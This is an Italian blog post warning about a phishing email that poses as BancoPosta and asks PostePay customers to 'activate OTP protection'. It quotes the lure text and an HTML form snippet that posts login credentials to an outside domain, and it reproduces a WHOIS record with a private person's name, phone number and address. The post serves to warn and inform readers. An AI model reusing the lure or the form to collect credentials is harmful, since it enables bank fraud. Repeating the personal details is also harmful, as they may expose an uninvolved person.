Ennesimo tentativo di Phishing

E’ passato un po di tempo dal mio ultimo post in questo piccolo spazio web …. beh , mi riprometto di scrivere qualcosa (spero interessante) più spesso … 
Oggi vorrei appunto segnalare , come da titolo , l’ennesimo tentativo di “phishing” che stà girando in Rete questi giorni. Chi non conosce il significato di “phishing” qui qualche spiegazione.
Veniamo al fatto: 

Ricevo in una mia casella di posta elettronica questa email::

————————————————————————————————-

Gentile Cliente,

*****************************************************************************************************************

Il nuovo sistema per l`autorizzazione delle operazioni di pagamento (ricariche PostePay,ricariche telefoniche,pagamento bollettini) effettuate con la PostePay sui siti di Poste Italiane,prevede l`utilizzo di due strumenti:
1. La Carta PostePay
2. Il telefono cellulare “associato alla carta”,sul quale verra inviata via SMS la password dispositiva “usa e getta” denominata OTP(One Time Password) appositamente generata per ogni operazione di pagamento.
L`attivazione e semplice,gratuita e richiede 1 minuto.
*****************************************************************************************************************
Le alleghiamo la documentazione necessaria per attivare la protezione.
*****************************************************************************************************************
La ringraziamo per aver scelto i servizi BancoPosta.
Distinti Saluti
BancoPosta


allegati: css2012otp.htm

 ————————————————————————————————-
Il filtro antispam del fido Thunderbird lascia passare indisturbato il messaggio e relativo allegato.
Poste.it , del quale sono effettivamente Cliente, NON conosce l’indirizzo email dove ho ricevuto questo messaggio… (e già questa cosa fa pensare male) …. comunque l’allegato è questo file: css2012otp.htm
E’ un file “htm” apparentemente innocuo , nessun antivirus/antispyware rileva nulla di strano , si apre con qualsiasi browser (I.E., Firefox, Chrome, ecc). Una volta aperto appare una pagina cosi (clicca sull’immagine per ingrandire) :
Da notare quanto sìa subdola tale richiesta perché fa leva sull’esistenza di una misura di sicurezza recentemente messa in atto REALMENTE da Poste.it e riguardante l’utilizzo delle carte ricaricabili ‘PostePay’ , in pratica ogni carta viene associata al numero di telefono cellulare del Cliente intestatario della carta stessa (info piu precise qui) ……. peccato (per il truffatore) che per abilitare questa opzione bisogna RECARSI FISICAMENTE allo sportello postale ….
.
Nel modulo viene richiesto di digitare TUTTE le proprie credenziali di accesso al servizio di Poste.it. e di premere ‘ACCEDI’

NON FATELO !!!!!

 Ho dato un’occhiata all’interno del  file ‘css2012otp.htme ho trovato questo piccolo particolare:
---------------------------------------------------------------------------- cut
Accedi ai Servizi Online </strong></p>
<
form name="loginform1" method="POST"  onsubmit="javascript: 
return logintest(this);" action=" http://www.privati.pm/css.php ">
 --------------------------------------------------------------------------- cut
 
… in pratica se si compila il modulo in tutte le sue parti e si preme il tasto ‘ACCEDI’ i propri dati vengono inviati all’indirizzo “www.privati.pm/css.php” , con tutte le conseguenze del caso !!! (leggi azzeramento del credito presente sulla carta …)
Sempre più curioso sono andato a vedere a chi è intestato il dominio ‘privati.pm’ … ecco qua:

Privati.pm Whois Record

domain:      privati.pm
status:      ACTIVE
hold:        NO
holder-c:    RM4668-FRNIC
admin-c:     RM4668-FRNIC
tech-c:      H4-FRNIC
zone-c:      NFC1-FRNIC
nsl-id:      NSL24726-FRNIC
registrar:   One.com A/S
anniversary: 13/04
created:     13/04/2012
last-update: 13/04/2012
source:      FRNIC

ns-list:     NSL24726-FRNIC
nserver:     ns01.one.com
nserver:     ns02.one.com
source:      FRNIC

registrar:   One.com A/S
type:        Isp Option 2
anonymous:   YES
registered:  18/05/2004
source:      FRNIC

nic-hdl:     H4-FRNIC
type:        ROLE
contact:     hostmaster
address:     One.com A/S
address:     kalvebod Brygge 45
address:     1560 COPENHAGEN V
address:     DK
e-mail:      
admin-c:     AF851-FRNIC
tech-c:      AF851-FRNIC
changed:     15/02/2007 
anonymous:   NO
obsoleted:   NO
source:      FRNIC

nic-hdl:     RM4668-FRNIC
type:        PERSON
contact:     Romano Marco
address:     via del faro
address:     rm
address:     00192 roma
country:     IT
phone:       +39 3891072510
e-mail:      
changed:     13/04/2012 
anonymous:   NO
obsoleted:   NO
eligstatus:  ok
eligdate:    13/04/2012 11:18:07
source:      FRNIC

Il dominio in questione è assegnato a ‘Saint-Pierre e Miquelon‘  ed è  registrato presso la ‘One.com’ di Copenhagen (Danimarca) .

Ora non saprei dire se questo signore di Roma (se esiste …. ) è consapevole o meno di quello che sta succedendo, secondo me rischia di beccarsi come minimo qualche denuncia per tentativo di truffa.
Precedente 30 minuti di strizza ..... Successivo Digitale Terrestre: prossimamente si cambia ....